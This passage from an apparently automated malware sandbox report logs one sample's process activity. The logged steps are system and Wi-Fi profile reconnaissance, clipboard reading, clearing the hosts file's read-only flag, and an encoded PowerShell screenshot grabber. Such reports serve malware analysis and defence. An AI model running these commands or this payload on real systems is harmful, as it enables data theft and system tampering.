                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                                                                                                                                                                                        Imagebase:0x7ff650120000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:38
                                                                                                                                                                                                                                        Start time:16:10:48
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                                                                                                                                                                                                                                        Imagebase:0x7ff650120000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:39
                                                                                                                                                                                                                                        Start time:16:10:48
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:40
                                                                                                                                                                                                                                        Start time:16:10:48
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:41
                                                                                                                                                                                                                                        Start time:16:10:48
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:42
                                                                                                                                                                                                                                        Start time:16:10:48
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:44
                                                                                                                                                                                                                                        Start time:16:10:49
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:tree /A /F
                                                                                                                                                                                                                                        Imagebase:0x7ff6c98f0000
                                                                                                                                                                                                                                        File size:20'992 bytes
                                                                                                                                                                                                                                        MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:45
                                                                                                                                                                                                                                        Start time:16:10:49
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\systeminfo.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:systeminfo
                                                                                                                                                                                                                                        Imagebase:0x7ff60c800000
                                                                                                                                                                                                                                        File size:110'080 bytes
                                                                                                                                                                                                                                        MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:46
                                                                                                                                                                                                                                        Start time:16:10:49
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:powershell Get-Clipboard
                                                                                                                                                                                                                                        Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:47
                                                                                                                                                                                                                                        Start time:16:10:49
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                        Imagebase:0x7ff6d7870000
                                                                                                                                                                                                                                        File size:106'496 bytes
                                                                                                                                                                                                                                        MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:48
                                                                                                                                                                                                                                        Start time:16:10:49
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:netsh wlan show profile
                                                                                                                                                                                                                                        Imagebase:0x7ff75bcf0000
                                                                                                                                                                                                                                        File size:96'768 bytes
                                                                                                                                                                                                                                        MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:49
                                                                                                                                                                                                                                        Start time:16:10:49
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                                                                                                                                                                                                                        Imagebase:0x7ff6db890000
                                                                                                                                                                                                                                        File size:77'312 bytes
                                                                                                                                                                                                                                        MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:50
                                                                                                                                                                                                                                        Start time:16:10:50
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                        Imagebase:0x7ff650120000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:51
                                                                                                                                                                                                                                        Start time:16:10:50
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:52
                                                                                                                                                                                                                                        Start time:16:10:51
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                                                                                                                                                                        Imagebase:0x7ff650120000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:53
                                                                                                                                                                                                                                        Start time:16:10:51
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:tree /A /F
                                                                                                                                                                                                                                        Imagebase:0x7ff6c98f0000
                                                                                                                                                                                                                                        File size:20'992 bytes
                                                                                                                                                                                                                                        MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:54
                                                                                                                                                                                                                                        Start time:16:10:51
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:55
                                                                                                                                                                                                                                        Start time:16:10:51
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                                                                                                                                                        Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:56
                                                                                                                                                                                                                                        Start time:16:10:52
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                                                                                                                                                                                                                        Imagebase:0x7ff650120000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:57
                                                                                                                                                                                                                                        Start time:16:10:52
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:58
                                                                                                                                                                                                                                        Start time:16:10:52
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                        Imagebase:0x7ff650120000
                                                                                                                                                                                                                                        File size:289'792 bytes
